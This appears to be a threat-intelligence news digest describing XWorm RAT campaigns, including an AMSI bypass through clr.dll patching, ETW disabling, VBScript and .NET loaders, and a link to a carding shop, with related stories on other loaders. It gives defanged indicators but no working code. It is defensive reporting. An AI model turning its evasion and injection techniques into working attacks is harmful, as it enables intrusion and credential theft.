XWorm campaigns used AMSI bypasses and linked malware delivery to carding operations
Researchers detailed two XWorm delivery operations that relied on multi-stage loaders, in-memory execution, and AMSI bypasses to evade detection. In one campaign attributed to TAG-124, compromised legitimate websites redirected selected victims into a PowerShell chain that patched clr.dll to disable AmsiScanBuffer, suppressed PowerShell history, disabled ETW, fingerprinted hosts, and pulled an XOR-encrypted payload from sellmeyourbiz[.]com, ultimately delivering XWorm RAT. Breakglass reported low initial detection rates and observed victim-specific beaconing under /customers/, with encoded host details including hostname, domain, username, process ID, campaign ID, and hardware UUID.
A separate three-stage intrusion used a VBScript lure, Projet20Immobilier.vbs, masquerading as a French real-estate document to deploy XWorm V5.6 through a .NET loader and process injection into InstallUtil.exe. Breakglass assessed the operator was likely Brazilian based on Portuguese-language code artifacts and found the same infrastructure also hosted a Portuguese carding marketplace, Iluminat Store infosCC, suggesting a vertically integrated criminal pipeline that steals credentials and payment data with XWorm and monetizes them directly through fraud services. The malware infrastructure included servers on DigitalOcean and Contabo, and the sample used the default XWorm encryption key <123456789>, exposing weak operator OPSEC despite capabilities that included keylogging, screenshot capture, DNS hijacking, persistence, and ransomware plugin support.
Timeline
Mar 15, 2026
Breakglass links XWorm V5.6 delivery to Brazilian operator and carding shop
Breakglass analyzed a separate three-stage XWorm V5.6 infection chain using a VBScript lure, a .NET loader, and process injection into InstallUtil.exe, and assessed the operator was likely Brazilian based on Portuguese-language artifacts. The report also linked the malware infrastructure to a Portuguese-language carding marketplace, suggesting a vertically integrated cybercrime pipeline for stealing and monetizing credentials and payment data.
Mar 13, 2026
KongTuke campaign delivers XWorm RAT via multi-stage PowerShell chain
In March 2026, compromised legitimate websites redirected selected victims into a multi-stage PowerShell infection chain attributed to KongTuke / TAG-124 that ultimately delivered XWorm RAT from sellmeyourbiz[.]com. Breakglass identified Stage 2 as a coordinated AMSI-bypassing CLR patcher plus an obfuscated stager that also disabled ETW, fingerprinted hosts, and fetched an XOR-encrypted payload in memory.
Mar 13, 2026
KongTuke infrastructure receives TLS certificate
A Let's Encrypt certificate was issued for sellmeyourbiz[.]com, infrastructure later used in the KongTuke / TAG-124 infection chain. The report says the infrastructure was rapidly weaponized after certificate issuance.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Sources
Related Stories
Multi-stage malware delivery chains distributing XWorm and other RATs
Researchers reported evolving **multi-stage, script-heavy infection chains** used to deliver remote access trojans, including **XWorm**, **AsyncRAT**, and **Xeno RAT**. Securonix described a campaign dubbed **VOID#GEIST** that starts from phishing-delivered batch scripts fetched from *TryCloudflare* infrastructure, then chains additional batch/PowerShell stages, deploys a legitimate embedded Python runtime, decrypts shellcode, and executes it filelessly by injecting into `explorer.exe` using **Early Bird APC injection**, reducing disk artifacts and making each stage appear benign in isolation. Separately, SANS ISC documented another **XWorm** wave using an obfuscated JavaScript-to-PowerShell loader chain that drops a temporary PowerShell script (e.g., `C:\Temp\ps_...ps1`), decodes additional in-memory PowerShell, and uses a DLL exporting `ProcessHollowing` to inject the XWorm client into a .NET compiler process. The write-up included configuration and IOCs such as a C2 endpoint `204[.]10[.]160[.]190:7003`, mutex `Cqu1F0NxohroKG5U`, and multiple SHA-256 hashes for the JavaScript, PowerShell, DLL loader, and XWorm payload, indicating continued high-volume distribution with frequently changing delivery techniques.
1 months ago
Multiple Malware Campaigns Abuse Phishing and Legitimate Cloud Services to Compromise Windows and Linux Systems
Reporting describes several unrelated but contemporaneous malware operations targeting both Windows and Linux environments. In Taiwan, FortiGuard Labs observed targeted phishing using tax and e-invoice lures to deliver **Winos 4.0 (ValleyRat)** and plugins, with delivery chains including malicious `.LNK` files, **DLL sideloading**, and **BYOVD** using the vulnerable driver `wsftprm.sys`, supported by rapidly rotating domains and cloud-hosted infrastructure that reduces the effectiveness of static blocklists. Separately, Cato CTRL reported a new Windows loader, **Foxveil**, that stages and retrieves shellcode via trusted platforms (**Cloudflare Pages**, **Netlify**, and **Discord attachments**) and executes payloads using techniques including **Early Bird APC injection** (often into a fake `svchost.exe`) or self-injection, while persisting via Windows services or masqueraded binaries dropped into `SysWOW64`. Additional reporting covers distinct campaigns in other regions and platforms. A LATAM-focused intrusion chain uses fake bank receipt lures (double-extension such as `.pdf.js`) to deliver **XWorm v5.6**, employing oversized/obfuscated JavaScript, WMI-based process creation (`Win32_Process`) to launch hidden PowerShell, and abuse of a hardcoded **Cloudinary** URL for staging—capabilities consistent with credential theft and enabling follow-on ransomware. Trellix analysis described a separate **Monero** cryptomining operation distributed via pirated software installers that propagates through **USB/external drives** to reach even air-gapped systems, using multi-component “watchdog” self-healing behavior and aggressive defense-evasion. On Linux, LevelBlue detailed a new **SysUpdate** variant (packed `ELF64`) that performs host reconnaissance and uses strong C2 encryption; researchers built a **Unicorn Engine**-based emulation tool to reproduce key generation/encryption routines and decrypt captured C2 traffic for investigation and detection engineering.
1 months ago
ResolverRAT, LummaStealer, and Amadey Linked in Multi-Tool Cybercrime Campaign
Researchers tied **ResolverRAT**, **LummaStealer**, and an **Amadey** botnet cluster to an active financially motivated campaign that has operated since at least late 2025 and uses fake browser update lures, staged loaders, and legitimate remote management tools for persistence. One analyzed chain used a Donut-decrypted, triple-protected `.NET` loader to deliver both ResolverRAT and LummaStealer at once, combining persistent remote access with credential and cryptocurrency wallet theft. The malware used layered obfuscation including .NET Reactor, custom transformations, AES-256-CBC, GZip, process hollowing, fragmented WinAPI reconstruction, forged compile timestamps, encrypted resource blobs, and certificate pinning, while operators rotated infrastructure across dozens of IPs, multiple domains, and hosting providers in Russia, the Netherlands, Germany, Poland, and elsewhere. Investigators also identified a fake Microsoft-themed domain, **pat[.]microsoft-telemetry[.]at**, and newly activated infrastructure such as **kampf[.]huehnchenfarm[.]ru** tied to the same ecosystem. A parallel March 2026 investigation linked the **fbf543** Amadey campaign to more than 50 payloads spanning at least 13 malware families, including Vidar, QuasarRAT, XWorm, AsyncRAT, Smoke Loader, and LummaStealer, with delivery through fake installers and hosting on infrastructure centered on **Omegatech LTD (AS202412)** and related abusive networks. Analysts found that the operators also abused nine legitimate, signed RMM tools from **ConnectWise, DattoRMM, Atera, GoToResolve, and N-able**, configuring them to beacon to attacker-controlled relays rather than compromising the vendors themselves. A separate Go-based loader unpacked LummaStealer with AES, RC4, and QuickLZ before hollowing **AppLaunch.exe**, reinforcing a playbook built around stealthy loaders, infostealer deployment, redundant access channels, and monetization consistent with an initial access broker or ransomware affiliate operation.
1 weeks ago